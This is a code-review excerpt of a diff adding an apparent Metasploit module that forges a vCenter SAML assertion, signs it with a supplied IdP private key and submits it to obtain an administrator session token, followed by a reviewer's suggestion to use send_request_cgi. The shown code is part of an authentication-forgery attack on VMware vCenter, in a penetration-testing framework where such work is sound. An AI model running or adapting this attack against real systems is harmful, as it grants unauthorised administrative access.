modules/auxiliary/admin/vmware/vcenter_forge_saml_token.rb

```diff
@@ -0,0 +1,414 @@
+
+    unless validate_fqdn(vcenter_fqdn)
+      fail_with(Msf::Exploit::Failure::BadConfig, "Invalid vCenter FQDN provided: #{vcenter_fqdn}")
+    end
+
+    unless validate_fqdn(domain)
+      fail_with(Msf::Exploit::Failure::BadConfig, "Invalid vCenter SSO domain provided: #{domain}")
+    end
+
+    validate_timestamps
+    validate_idp_options
+
+    print_status('HTTP GET => /ui/login ...')
+    init_vsphere_login
+
+    vprint_status('Create forged SAML assertion XML ...')
+    unless (vsphere_saml_response = get_saml_response_template)
+      fail_with(Msf::Exploit::Failure::Unknown, 'Unable to generate SAML response XML')
+    end
+
+    vprint_status('Sign forged SAML assertion with IdP key ...')
+    unless (vsphere_saml_auth = sign_vcenter_saml(vsphere_saml_response))
+      fail_with(Msf::Exploit::Failure::Unknown, 'Unable to sign SAML assertion')
+    end
+
+    print_status('HTTP POST => /ui/saml/websso/sso ...')
+    unless (session_cookie = submit_vcenter_auth(vsphere_saml_auth))
+      fail_with(Msf::Exploit::Failure::Unknown, 'Unable to acquire administrator session token')
+    end
+
+    print_good('Got valid administrator session token!')
+    print_good("\t#{session_cookie}")
+  end
+
+  def validate_idp_options
+    begin
+      idp_cert_file = File.binread(vc_idp_cert)
+      idp_key_file = File.binread(vc_idp_key)
+      vmca_cert_file = File.binread(vc_vmca_cert)
+    rescue StandardError => e
+      print_error("File read failure: #{e.class} - #{e.message}")
+      fail_with(Msf::Exploit::Failure::BadConfig, 'Error reading certificate files')
+    end
+
+    unless (ca = OpenSSL::X509::Certificate.new(vmca_cert_file))
+      fail_with(Msf::Exploit::Failure::BadConfig, "Invalid VMCA certificate: #{vc_vmca_cert.path}")
+    end
+
+    unless (pub = OpenSSL::X509::Certificate.new(idp_cert_file))
+      fail_with(Msf::Exploit::Failure::BadConfig, "Invalid IdP certificate: #{vc_idp_cert.path}")
+    end
+
+    unless (priv = OpenSSL::PKey::RSA.new(idp_key_file))
+      fail_with(Msf::Exploit::Failure::BadConfig, "Invalid IdP private key: #{vc_idp_key.path}")
+    end
+
+    unless pub.check_private_key(priv)
+      fail_with(Msf::Exploit::Failure::BadConfig, 'Provided IdP public and private keys are not associated')
+    end
+
+    unless (pub.issuer.to_s == ca.subject.to_s)
+      print_error("IdP issuer DN does not match provided VMCA subject DN!\n\t  IdP Issuer DN: #{pub.issuer}\n\tVMCA Subject DN: #{ca.subject}")
+      fail_with(Msf::Exploit::Failure::BadConfig, 'Invalid IdP certificate chain')
+    end
+
+    unless pub.verify(ca.public_key)
+      fail_with(Msf::Exploit::Failure::BadConfig, 'Provided IdP certificate does not chain to VMCA certificate')
+    end
+
+    print_good('Validated vCenter Single Sign-On IdP trusted certificate chain')
+
+    @vcenter_saml_idp_cert = pub
+    @vcenter_saml_idp_key = priv
+    @vcenter_saml_ca_cert = ca
+  end
+
+  def init_vsphere_login
+    res = send_request_raw({
```

Comment:
`send_request_cgi` is preferred over `send_request_raw`, if possible.

```suggestion
    res = send_request_cgi({
```